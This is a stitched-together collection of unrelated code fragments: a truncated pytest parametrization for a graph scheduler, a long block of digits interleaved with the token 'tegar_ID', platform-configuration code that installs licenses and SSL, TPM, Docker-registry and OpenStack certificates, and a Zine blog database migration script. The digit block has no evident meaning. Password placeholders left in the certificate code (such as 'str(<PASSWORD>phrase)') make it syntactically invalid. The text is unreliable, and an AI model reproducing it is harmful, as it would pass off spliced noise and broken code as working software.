sched = graph_scheduler.Scheduler(graph)
sched.add_condition('A', node_condition)
output = list(sched.run(termination_conds=termination_conditions))
assert output == pytest.helpers.setify_expected_output(expected_output)
@pytest.mark.parametrize(
'node_condition, termination_conditions, expected_output, n_sequences, n_state_updates_per_sequence',
[
pytest.param(
graph_scheduler.AtEnvironmentStateUpdateNStart(2),
{TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNPasses(1)},
[[set(), set(), 'A', set()]],
1,
4,
id='AtEnvironmentStateUpdateNStart'
),
pytest.param(
graph_scheduler.AtEnvironmentSequence(4),
{TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNPasses(1)},
[[set()], [set()], [set()], [set()], ['A'], [set()]],
6,
1,
id='AtEnvironmentSequence'
),
pytest.param(
graph_scheduler.AfterEnvironmentSequence(3),
{TimeScale.ENVIRONMENT_STATE_UPDATE: graph_scheduler.AfterNPasses(1)},
[[set()], [set()], [set()], [set()], ['A'], | |
1 5 tegar_ID 1 3 6 3 4 4 3 6 7 4 3 3 4 2 2 6 1 4 9 1 \
4 5 3 4 4 3 8 9 4 3 3 4 2 2 6 1 5 tegar_ID 1 3 6 3 4 4 3 6 \
7 4 3 3 4 2 2 6 1 4 9 1 5 4 2 2 6 1 4 9 1 5 7 3 4 4 3 8 9 \
4 3 3 4 2 2 6 1 5 tegar_ID 1 3 6 3 4 4 3 6 7 4 3 3 4 2 2 6 \
1 4 9 1 4 5 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 4 4\
3 8 9 4 3 3 4 9 1 3 4 4 3 8 2 4 3 3 4 8 2 7 1 5 2 3 4 4\
3 8 9 4 3 3 4 9 3 3 2 3 4 4 3 7 1 4 3 3 4 6 6 1 tegar_ID \
8 9 7 9 9 1 tegar_ID 7 9 5 6 7 1 1 1 1 tegar_ID tegar_ID 1 teg\
ar_ID 1 1 1 4 3 2 3 2 3 2 3 4 4 3 8 2 4 3 3 4 2 2 6 1 4 8 \
1 4 3 2 2 6 1 4 8 1 2 9 2 2 6 1 4 8 1 7 9 2 2 6 1 4 8 1 7 9 \
2 2 6 1 4 8 1 7 9 2 2 6 1 4 8 1 2 9 2 2 6 1 4 8 1 7 9 2 2 6 \
1 4 8 1 7 9 2 2 6 1 4 8 1 4 7 3 4 1 tegar_ID 1 1 2 1 1 4 1 te\
gar_ID 5 1 1 tegar_ID 1 1 6 3 2 6 7 4 3 3 4 3 2 3 2 2 2 6 1 \
4 9 1 5 4 2 2 6 1 4 9 1 5 1 3 4 4 3 8 9 4 3 3 4 2 2 6 1 5 t\
egar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6\
2 2 6 1 5 tegar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6 2 2 6 1 5 t\
egar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6\
2 2 6 1 5 tegar_ID 1 3 6 3 4 4 3 6 7 4 3 3 4 2 2 6 1 4 9 1\
4 4 2 2 6 1 4 9 1 5 7 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2\
3 2 3 2 3 4 4 3 7 1 4 3 3 4 4 3 3 4 4 3 6 7 4 3 3 4 4 6\
4 7 8 tegar_ID 5 1 8 2 5 3 4 8 7 8 3 2 7 1 5 2 7 8 5 3 3\
2 3 2 3 2 3 2 3 2 3 4 4 3 8 2 4 3 3 4 2 2 6 1 4 8 1 3 1 \
2 2 6 1 4 8 1 2 9 2 2 6 1 4 8 1 7 1 2 2 6 1 4 8 1 3 1 2 2 6 \
1 4 8 1 3 1 2 2 6 1 4 8 1 4 3 2 2 6 1 4 8 1 7 1 2 2 6 1 4 8 \
1 2 9 2 2 6 1 4 8 1 7 1 2 2 6 1 4 8 1 4 3 2 2 6 1 4 8 1 4 7 \
3 4 1 tegar_ID 1 1 2 1 1 4 1 tegar_ID 5 1 1 tegar_ID 1 1 6 3 2 \
6 7 4 3 3 4 3 2 3 2 3 2 3 2 2 2 6 1 4 9 1 5 4 2 2 6 1 4 9 \
1 5 1 2 2 6 1 4 9 1 4 5 3 4 4 3 8 7 4 3 3 4 2 2 6 1 4 9 1 \
6 tegar_ID 2 2 6 1 4 9 1 6 9 2 2 6 1 4 9 1 6 9 2 2 6 1 4 9 1 \
6 9 2 2 6 1 4 9 1 6 9 2 2 6 1 4 9 1 6 9 2 2 6 1 4 9 1 5 7 3 \
2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 2 3 4 4 3 7 \
1 4 3 3 4 4 3 3 4 4 3 6 7 4 3 3 4 7 7 1 1 4 3 2 8 8 7 2 \
9 7 1 tegar_ID 9 1 1 5 1 1 6 1 tegar_ID 1 1 1 4 3 2 3 2 3 2 3\
2 3 2 3 2 3 2 3 4 4 3 8 2 4 3 3 4 2 2 6 1 4 8 1 3 1 2 2 6\
1 4 8 1 4 3 2 2 6 1 4 8 1 7 1 2 2 6 1 4 8 1 3 1 2 2 6 1 4 8\
1 3 1 2 2 6 1 4 8 1 5 1 2 2 6 1 4 8 1 7 1 2 2 6 1 4 8 1 3 1\
2 2 6 1 4 8 1 3 1 2 2 6 1 4 8 1 3 1 2 2 6 1 4 8 1 3 1 3 4 \
1 tegar_ID 1 1 2 1 1 4 1 tegar_ID 5 1 1 tegar_ID 1 1 6 3 2 6 7 \
4 3 3 4 3 2 3 2 3 2 3 2 3 2 2 2 6 1 4 9 1 4 5 2 2 6 1 4 9 \
1 4 5 2 2 6 1 4 8 1 3 6 2 2 6 1 4 8 1 3 6 2 2 6 1 4 8 1 3 6 \
2 2 6 1 5 tegar_ID 1 3 6 3 4 4 3 8 9 8 9 4 3 3 4 2 2 6 1 5 \
tegar_ID 1 4 4 3 4 4 3 8 7 8 7 4 3 3 4 2 2 6 1 5 tegar_ID 1 \
3 6 2 2 6 1 5 tegar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6 2 2 6 1 \
5 tegar_ID 1 3 6 2 2 6 1 5 tegar_ID 1 3 6 3 4 4 3 8 2 4 3 3 4\
2 2 6 1 5 tegar_ID 1 4 6 3 4 4 3 8 7 4 3 3 4 4 6 2 3 9 1 8\
9 1 6 1 1 1 1 7 9 3 2 3 2 3 2 3 2 3 4 4 3 7 1 4 3 3 4 4 \
3 3 4 4 3 6 7 4 3 3 4 7 7 1 tegar_ID 1 8 9 1 1 1 1 1 7 8 3 \
1 1 7 1 tegar_ID 1 3 2 3 2 3 2 3 2 3 2 3 2 3 | |
already exists, we will allow ceph config file to be overwritten.
# Thus, we won't raise an exception if the file already exists.
if os.path.exists(opt_ceph_conf_file):
LOG.info("Overwriting file %s in %s " %
(ceph_conf_filename, tsc.PLATFORM_CEPH_CONF_PATH))
try:
with open(opt_ceph_conf_file, 'w+') as f:
f.write(contents)
except IOError:
msg = _("Failed to write ceph config file in %s " %
tsc.PLATFORM_CEPH_CONF_PATH)
raise exception.SysinvException(msg)
def install_license_file(self, context, contents):
"""Notify agent to install license file with the supplied data.
:param context: request context.
:param contents: contents of license file.
"""
LOG.info("Install license file.")
license_file = os.path.join(tsc.PLATFORM_CONF_PATH,
constants.LICENSE_FILE)
temp_license_file = license_file + '.temp'
with open(temp_license_file, 'w') as f:
f.write(contents)
f.close()
# Verify license
try:
license.verify_license(temp_license_file)
except Exception as e:
raise exception.SysinvException(str(e))
os.rename(temp_license_file, license_file)
try:
subprocess.check_output(["cp", license_file,
os.path.join(tsc.CONFIG_PATH, constants.LICENSE_FILE)])
except subprocess.CalledProcessError as e:
LOG.error("Fail to install license to redundant "
"storage, output: %s" % e.output)
os.remove(license_file)
raise exception.SysinvException(_(
"ERROR: Failed to install license to redundant storage."))
hostname = subprocess.check_output(["hostname"]).rstrip()
validHostnames = [constants.CONTROLLER_0_HOSTNAME,
constants.CONTROLLER_1_HOSTNAME]
if hostname == 'localhost':
raise exception.SysinvException(_(
"ERROR: Host undefined. Unable to install license"))
elif hostname not in validHostnames:
raise exception.SysinvException(_(
"ERROR: Invalid hostname for controller node: %s") % hostname)
personalities = [constants.CONTROLLER]
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
'personalities': personalities,
'file_names': [license_file],
'file_content': contents,
}
self._config_update_file(context, config_uuid, config_dict)
def update_distributed_cloud_role(self, context):
"""Configure the distributed cloud role.
:param context: an admin context.
"""
# update manifest files and nofity agents to apply the change.
# Should only be applicable to the single controller that is up
# when the dc role is configured, but add personalities anyway.
personalities = [constants.CONTROLLER,
constants.WORKER,
constants.STORAGE]
config_uuid = self._config_update_hosts(context, personalities)
# NOTE: no specific classes need to be specified since the default
# platform::config will be applied that will configure the platform.conf
config_dict = {"personalities": personalities}
self._config_apply_runtime_manifest(context, config_uuid, config_dict)
def _destroy_certificates(self, context):
"""Delete certificates."""
LOG.info("_destroy_certificates clear ssl/tpm certificates")
certificates = self.dbapi.certificate_get_list()
for certificate in certificates:
if certificate.certtype in [constants.CERT_MODE_SSL,
constants.CERT_MODE_TPM,
constants.CERT_MODE_OPENSTACK]:
self.dbapi.certificate_destroy(certificate.uuid)
personalities = [constants.CONTROLLER]
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
'personalities': personalities,
'file_names': [constants.SSL_PEM_FILE],
'file_content': None,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
'nobackup': True,
}
self._config_update_file(context, config_uuid, config_dict)
def _destroy_tpm_config(self, context, tpm_obj=None):
"""Delete a tpmconfig."""
if not tpm_obj:
tpm_obj = None
try:
tpm_obj = self.dbapi.tpmconfig_get_one()
except exception.NotFound:
return
tpm_file = tpm_obj.tpm_path
tpmdevices = self.dbapi.tpmdevice_get_list()
for device in tpmdevices:
self.dbapi.tpmdevice_destroy(device.uuid)
self.dbapi.tpmconfig_destroy(tpm_obj.uuid)
self.update_tpm_config_manifests(context,
delete_tpm_file=tpm_file)
alarms = self.fm_api.get_faults_by_id(
fm_constants.FM_ALARM_ID_TPM_INIT)
if alarms:
for alarm in alarms:
self.fm_api.clear_fault(
fm_constants.FM_ALARM_ID_TPM_INIT,
alarm.entity_instance_id)
@staticmethod
def _extract_keys_from_pem(mode, pem_contents, cert_format,
passphrase=None):
"""Extract keys from the pem contents
:param mode: mode one of: ssl, tpm_mode, docker_registry
:param pem_contents: pem_contents
:param cert_format: serialization.PrivateFormat
:param passphrase: passphrase for PEM file
:returns: private_bytes, public_bytes, signature
"""
temp_pem_file = constants.SSL_PEM_FILE + '.temp'
with os.fdopen(os.open(temp_pem_file, os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'w') as f:
f.write(pem_contents)
if passphrase:
passphrase = str(<PASSWORD>phrase)
private_bytes = None
private_mode = False
if mode in [constants.CERT_MODE_SSL,
constants.CERT_MODE_TPM,
constants.CERT_MODE_DOCKER_REGISTRY,
constants.CERT_MODE_OPENSTACK,
]:
private_mode = True
with open(temp_pem_file, "r") as key_file:
if private_mode:
# extract private_key with passphrase
try:
private_key = serialization.load_pem_private_key(
key_file.read(),
password=<PASSWORD>phrase,
backend=default_backend())
except Exception as e:
raise exception.SysinvException(_("Error decrypting PEM "
"file: %s" % e))
key_file.seek(0)
# extract the certificate from the pem file
cert = x509.load_pem_x509_certificate(key_file.read(),
default_backend())
os.remove(temp_pem_file)
if private_mode:
if not isinstance(private_key, rsa.RSAPrivateKey):
raise exception.SysinvException(_("Only RSA encryption based "
"Private Keys are supported."))
private_bytes = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=cert_format,
encryption_algorithm=serialization.NoEncryption())
signature = mode + '_' + str(cert.serial_number)
if len(signature) > 255:
LOG.info("Truncating certificate serial no %s" % signature)
signature = signature[:255]
LOG.info("config_certificate signature=%s" % signature)
# format=serialization.PrivateFormat.TraditionalOpenSSL,
public_bytes = cert.public_bytes(encoding=serialization.Encoding.PEM)
return private_bytes, public_bytes, signature
def _perform_config_certificate_tpm_mode(self, context,
tpm, private_bytes, public_bytes):
personalities = [constants.CONTROLLER]
os_tpmdevices = glob.glob('/dev/tpm*')
if not os_tpmdevices:
msg = "TPM device does not exist on active controller"
LOG.warn(msg)
raise exception.SysinvException(_(msg))
config_uuid = self._config_update_hosts(context, personalities)
cert_path = constants.SSL_CERT_DIR + 'key.pem'
public_path = constants.SSL_CERT_DIR + 'cert.pem'
config_dict = {
'personalities': personalities,
'file_names': [cert_path, public_path],
'file_content': {cert_path: private_bytes,
public_path: public_bytes},
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
tpmconfig_dict = {'tpm_path': constants.SSL_CERT_DIR + 'object.tpm'}
if not tpm:
self.dbapi.tpmconfig_create(tpmconfig_dict)
tpmconfig_dict.update(
{'cert_path': constants.SSL_CERT_DIR + 'key.pem',
'public_path': constants.SSL_CERT_DIR + 'cert.pem'})
self.update_tpm_config(context,
tpmconfig_dict,
update_file_required=False)
def _get_registry_floating_address(self):
"""gets the registry floating address. Currently this is mgmt
"""
registry_network = self.dbapi.network_get_by_type(
constants.NETWORK_TYPE_MGMT)
registry_network_addr_pool = self.dbapi.address_pool_get(
registry_network.pool_uuid)
addr = registry_network_addr_pool.floating_address
return addr
def config_certificate(self, context, pem_contents, config_dict):
"""Configure certificate with the supplied data.
:param context: an admin context.
:param pem_contents: contents of certificate in pem format.
:param config_dict: dictionary of certificate config attributes.
In regular mode, the SSL certificate is crafted from the
isolated private and public keys.
In tpm_mode, this is done by tpmconfig
"""
passphrase = config_dict.get('passphrase', None)
mode = config_dict.get('mode', None)
LOG.info("config_certificate mode=%s" % mode)
private_bytes, public_bytes, signature = \
self._extract_keys_from_pem(mode, pem_contents,
serialization.PrivateFormat.PKCS8,
passphrase)
personalities = [constants.CONTROLLER]
tpm = None
try:
tpm = self.dbapi.tpmconfig_get_one()
except exception.NotFound:
pass
if mode == constants.CERT_MODE_TPM:
self._perform_config_certificate_tpm_mode(
context, tpm, private_bytes, public_bytes)
file_content = public_bytes
# copy the certificate to shared directory
with os.fdopen(os.open(constants.SSL_PEM_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(file_content)
elif mode == constants.CERT_MODE_SSL:
config_uuid = self._config_update_hosts(context, personalities)
file_content = private_bytes + public_bytes
config_dict = {
'personalities': personalities,
'file_names': [constants.SSL_PEM_FILE],
'file_content': file_content,
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
# copy the certificate to shared directory
with os.fdopen(os.open(constants.SSL_PEM_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(file_content)
if tpm:
LOG.info("tpm_mode not requested; destroy tpmconfig=%s" %
tpm.uuid)
self._destroy_tpm_config(context, tpm_obj=tpm)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['platform::haproxy::runtime',
'openstack::horizon::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
elif mode == constants.CERT_MODE_SSL_CA:
file_content = public_bytes
personalities = [constants.CONTROLLER,
constants.WORKER,
constants.STORAGE]
# copy the certificate to shared directory
with os.fdopen(os.open(constants.SSL_CERT_CA_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_DEFAULT),
'wb') as f:
f.write(file_content)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['platform::config::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict,
force=True)
elif mode == constants.CERT_MODE_DOCKER_REGISTRY:
LOG.info("Docker registry certificate install")
# docker registry requires a PKCS1 key for the token server
pkcs1_private_bytes, pkcs1_public_bytes, pkcs1_signature = \
self._extract_keys_from_pem(mode, pem_contents,
serialization.PrivateFormat
.TraditionalOpenSSL, passphrase)
# install certificate, key, and pkcs1 key to controllers
config_uuid = self._config_update_hosts(context, personalities)
key_path = constants.DOCKER_REGISTRY_KEY_FILE
cert_path = constants.DOCKER_REGISTRY_CERT_FILE
pkcs1_key_path = constants.DOCKER_REGISTRY_PKCS1_KEY_FILE
config_dict = {
'personalities': personalities,
'file_names': [key_path, cert_path, pkcs1_key_path],
'file_content': {key_path: private_bytes,
cert_path: public_bytes,
pkcs1_key_path: pkcs1_private_bytes},
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
# copy certificate to shared directory
with os.fdopen(os.open(constants.DOCKER_REGISTRY_CERT_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(public_bytes)
with os.fdopen(os.open(constants.DOCKER_REGISTRY_KEY_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(private_bytes)
with os.fdopen(os.open(constants.DOCKER_REGISTRY_PKCS1_KEY_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(pkcs1_private_bytes)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['platform::dockerdistribution::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
# install docker certificate on controllers and workers
docker_cert_path = os.path.join("/etc/docker/certs.d",
constants.DOCKER_REGISTRY_SERVER,
"registry-cert.crt")
personalities = [constants.CONTROLLER,
constants.WORKER]
config_uuid = self._config_update_hosts(context,
personalities)
config_dict = {
'personalities': personalities,
'file_names': [docker_cert_path],
'file_content': public_bytes,
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
elif mode == constants.CERT_MODE_OPENSTACK:
config_uuid = self._config_update_hosts(context, personalities)
key_path = constants.OPENSTACK_CERT_KEY_FILE
cert_path = constants.OPENSTACK_CERT_FILE
config_dict = {
'personalities': personalities,
'file_names': [key_path, cert_path],
'file_content': {key_path: private_bytes,
cert_path: public_bytes},
'nobackup': True,
'permissions': constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY,
}
self._config_update_file(context, config_uuid, config_dict)
if not os.path.exists(constants.CERT_OPENSTACK_SHARED_DIR):
os.makedirs(constants.CERT_OPENSTACK_SHARED_DIR)
# copy the certificate to shared directory
with os.fdopen(os.open(constants.OPENSTACK_CERT_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(public_bytes)
with os.fdopen(os.open(constants.OPENSTACK_CERT_KEY_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(private_bytes)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['openstack::keystone::endpoint::runtime',
'openstack::horizon::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
elif mode == constants.CERT_MODE_OPENSTACK_CA:
config_uuid = self._config_update_hosts(context, personalities)
file_content = public_bytes
config_dict = {
'personalities': personalities,
'file_names': [constants.OPENSTACK_CERT_CA_FILE],
'file_content': file_content,
'permissions': constants.CONFIG_FILE_PERMISSION_DEFAULT,
}
self._config_update_file(context, config_uuid, config_dict)
# copy the certificate to shared directory
with os.fdopen(os.open(constants.OPENSTACK_CERT_CA_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_DEFAULT),
'wb') as f:
f.write(file_content)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['openstack::keystone::endpoint::runtime',
'openstack::horizon::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
else:
msg = "config_certificate unexpected mode=%s" % mode
LOG.warn(msg)
raise exception.SysinvException(_(msg))
return signature
def _config_selfsigned_certificate(self, context):
"""
This code is invoked when https is enabled
to install a self signed certificate to get started
:param context: an admin context.
"""
mode = constants.CERT_MODE_SSL
passphrase = <PASSWORD>
certificate_file = constants.SSL_PEM_SS_FILE
with open(certificate_file) as pemfile:
pem_contents = pemfile.read()
LOG.info("_config_selfsigned_certificate mode=%s file=%s" % (mode, certificate_file))
private_bytes, public_bytes, signature = \
self._extract_keys_from_pem(mode, pem_contents,
serialization.PrivateFormat.PKCS8,
passphrase)
personalities | |
<reponame>mitsuhiko/zine<filename>zine/upgrades/versions/001_split_tables.py<gh_stars>10-100
"""Switch to split tables for comments, posts and texts"""
from copy import deepcopy
from sqlalchemy.exceptions import ProgrammingError, OperationalError
from sqlalchemy.types import MutableType, TypeDecorator
from zine.upgrades.versions import *
metadata1 = db.MetaData()
metadata2 = db.MetaData()
# Also define ZEMLParserData here in case it changes. This way it won't break
# the change script
class ZEMLParserData(MutableType, TypeDecorator):
"""Holds parser data."""
impl = db.Binary
def process_bind_param(self, value, dialect):
if value is None:
return
from zine.utils.zeml import dump_parser_data
return dump_parser_data(value)
def process_result_value(self, value, dialect):
from zine.utils.zeml import load_parser_data
try:
return load_parser_data(value)
except ValueError: # Parser data invalid. Database corruption?
from zine.i18n import _
from zine.utils import log
log.exception(_(u'Error when loading parsed data from database. '
u'Maybe the database was manually edited and got '
u'corrupted? The system returned an empty value.'))
return {}
def copy_value(self, value):
return deepcopy(value)
users_old = db.Table('users', metadata1,
db.Column('user_id', db.Integer, primary_key=True),
db.Column('username', db.String(30)),
db.Column('real_name', db.String(180)),
db.Column('display_name', db.String(180)),
db.Column('description', db.Text),
db.Column('extra', db.PickleType),
db.Column('pw_hash', db.String(70)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('is_author', db.Boolean)
)
users_new = db.Table('users', metadata2,
db.Column('user_id', db.Integer, primary_key=True),
db.Column('username', db.String(30)),
db.Column('real_name', db.String(180)),
db.Column('display_name', db.String(180)),
db.Column('description', db.Text),
db.Column('extra', db.PickleType),
db.Column('pw_hash', db.String(70)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('is_author', db.Boolean)
)
texts = db.Table('texts', metadata2,
db.Column('text_id', db.Integer, primary_key=True),
db.Column('text', db.Text),
db.Column('parser_data', ZEMLParserData),
db.Column('extra', db.PickleType)
)
# See http://www.sqlalchemy.org/trac/ticket/1071
posts_new_seq = db.Sequence('posts_post_id_seq_migrate_script_001')
posts_new = db.Table('posts', metadata2,
db.Column('post_id', db.Integer, posts_new_seq, primary_key=True),
db.Column('pub_date', db.DateTime),
db.Column('last_update', db.DateTime),
db.Column('slug', db.String(200), index=True, nullable=False),
db.Column('uid', db.String(250)),
db.Column('title', db.String(150)),
db.Column('text_id', db.Integer, db.ForeignKey('texts.text_id')),
db.Column('author_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('comments_enabled', db.Boolean),
db.Column('comment_count', db.Integer, nullable=False, default=0),
db.Column('pings_enabled', db.Boolean),
db.Column('content_type', db.String(40), index=True),
db.Column('status', db.Integer),
)
posts_old = db.Table('posts', metadata1,
db.Column('post_id', db.Integer, primary_key=True),
db.Column('pub_date', db.DateTime),
db.Column('last_update', db.DateTime),
db.Column('slug', db.String(200), index=True, nullable=False),
db.Column('uid', db.String(250)),
db.Column('title', db.String(150)),
db.Column('text', db.Text),
db.Column('author_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('parser_data', db.ZEMLParserData),
db.Column('comments_enabled', db.Boolean),
db.Column('pings_enabled', db.Boolean),
db.Column('content_type', db.String(40), index=True),
db.Column('extra', db.PickleType),
db.Column('status', db.Integer)
)
comments_old = db.Table('comments', metadata1,
db.Column('comment_id', db.Integer, primary_key=True),
db.Column('post_id', db.Integer, db.ForeignKey('posts.post_id')),
db.Column('user_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('author', db.String(160)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('text', db.Text),
db.Column('is_pingback', db.Boolean, nullable=False),
db.Column('parser_data', db.ZEMLParserData),
db.Column('parent_id', db.Integer, db.ForeignKey('comments.comment_id')),
db.Column('pub_date', db.DateTime),
db.Column('blocked_msg', db.String(250)),
db.Column('submitter_ip', db.String(100)),
db.Column('status', db.Integer, nullable=False)
)
# See http://www.sqlalchemy.org/trac/ticket/1071
new_comments_seq = db.Sequence('comments_comment_id_seq_migrate_script_001')
comments_new = db.Table('comments', metadata2,
db.Column('comment_id', db.Integer, new_comments_seq, primary_key=True),
db.Column('post_id', db.Integer, db.ForeignKey('posts.post_id')),
db.Column('user_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('author', db.String(160)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('text_id', db.Integer, db.ForeignKey('texts.text_id')),
db.Column('is_pingback', db.Boolean, nullable=False),
db.Column('parent_id', db.Integer, db.ForeignKey('comments.comment_id')),
db.Column('pub_date', db.DateTime),
db.Column('blocked_msg', db.String(250)),
db.Column('submitter_ip', db.String(100)),
db.Column('status', db.Integer, nullable=False)
)
class PostOld(object):
post_id = None
def __init__(self, pub_date, last_update, slug, uid, title,
text, author_id, parser_data, comments_enabled, pings_enabled,
content_type, status, extra):
self.pub_date = pub_date
self.last_update = last_update
self.slug = slug
self.uid = uid
self.title = title
self.author_id = author_id
self.parser_data = parser_data
self.comments_enabled = comments_enabled
self.pings_enabled = pings_enabled
self.content_type = content_type
self.status = status
self.extra = extra
class PostNew(object):
post_id = text_id = None
def __init__(self, pub_date, last_update, slug, uid, title,
author_id, comments_enabled, comment_count, pings_enabled,
content_type, status):
self.pub_date = pub_date
self.last_update = last_update
self.slug = slug
self.uid = uid
self.title = title
self.author_id = author_id
self.comments_enabled = comments_enabled
self.comment_count = comment_count
self.pings_enabled = pings_enabled
self.content_type = content_type
self.status = status
class Text(object):
def __init__(self, text, parser_data, extra):
self.text = text
self.parser_data = parser_data
self.extra = extra
class CommentNew(object):
comment_id = None
def __init__(self, user_id, author, email, www, is_pingback, pub_date,
blocked_msg, submitter_ip, status):
self.user_id = user_id
self.author = author
self.email = email
self.www = www
self.is_pingback = is_pingback
self.pub_date = pub_date
self.blocked_msg = blocked_msg
self.submitter_ip = submitter_ip
self.status = status
class CommentOld(object):
comment_id = None
def __init__(self, user_id, author, email, www, text, is_pingback,
parser_data, pub_date, blocked_msg, submitter_ip,
status):
self.user_id = user_id
self.author = author
self.email = email
self.www = www
self.text = text
self.is_pingback = is_pingback
self.parser_data = parser_data
self.pub_date = pub_date
self.blocked_msg = blocked_msg
self.submitter_ip = submitter_ip
self.status = status
class User(object):
pass
def map_tables(mapper):
clear_mappers()
mapper(PostOld, posts_old, properties=dict(
comments = db.relation(
CommentOld, backref='post', lazy=False,
primaryjoin=posts_old.c.post_id == comments_old.c.post_id,
order_by=[db.asc(comments_old.c.comment_id),
db.asc(comments_old.c.parent_id)])
), order_by=db.asc(posts_old.c.post_id))
mapper(PostNew, posts_new, properties=dict(
t = db.relation(Text, backref="post", uselist=False, lazy=False),
comments = db.relation(
CommentNew, backref='post', lazy=False,
primaryjoin=posts_new.c.post_id == comments_new.c.post_id,
order_by=[db.asc(comments_new.c.comment_id),
db.asc(comments_new.c.parent_id)])
), order_by=db.asc(posts_new.c.post_id))
mapper(Text, texts)
mapper(User, users_old)
mapper(CommentOld, comments_old, order_by=db.asc(comments_old.c.comment_id),
properties=dict(
children = db.relation(
CommentOld,
primaryjoin=comments_old.c.parent_id == comments_old.c.comment_id,
order_by=[db.asc(comments_old.c.pub_date)],
backref=db.backref(
'parent', remote_side=[comments_old.c.comment_id],
primaryjoin=comments_old.c.parent_id == comments_old.c.comment_id
), lazy=True)
)
)
mapper(CommentNew, comments_new, properties=dict(
t = db.relation(Text, backref="comment", uselist=False, lazy=False),
children = db.relation(CommentNew,
primaryjoin=comments_new.c.parent_id == comments_new.c.comment_id,
order_by=[db.asc(comments_new.c.pub_date)],
backref=db.backref(
'parent', remote_side=[comments_new.c.comment_id],
primaryjoin=comments_new.c.parent_id == comments_new.c.comment_id
), lazy=True)
), order_by=db.asc(comments_new.c.comment_id)
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine
# bind migrate_engine to your metadata
session = scoped_session(lambda: create_session(migrate_engine,
autoflush=True,
autocommit=False))
map_tables(session.mapper)
# Bind the engine
metadata1.bind = migrate_engine
metadata2.bind = migrate_engine
yield '<div class="message info">'
yield '<span class="progress">. </span>comment<br>\n'
yield '<span class="progress">+ </span>comment with parent_id<br>\n'
yield '<span class="progress">E </span>error handling comment<br>\n'
yield '</div>\n'
yield '<ul>'
yield ' <li>Auto-loading needed extra tables</li>\n'
post_links = db.Table('post_links', metadata2, autoload=True)
post_categories = db.Table('post_categories', metadata2, autoload=True)
post_tags = db.Table('post_tags', metadata2, autoload=True)
yield ' <li>Dropping old posts table indexes</li>\n'
for index in posts_old.indexes:
try:
index.drop(migrate_engine)
except (ProgrammingError, OperationalError):
# Index is on table definition but not on the database!? Weird
pass
yield ' <li>Dropping existing posts sequence if it exists</li>\n'
try:
posts_new_seq.drop(migrate_engine)
except Exception, err:
pass
yield ' <li>Dropping existing comments sequence if it exists</li>\n'
try:
new_comments_seq.drop(migrate_engine)
except Exception, err:
pass
yield ' <li>Querying for old posts from database</li>\n'
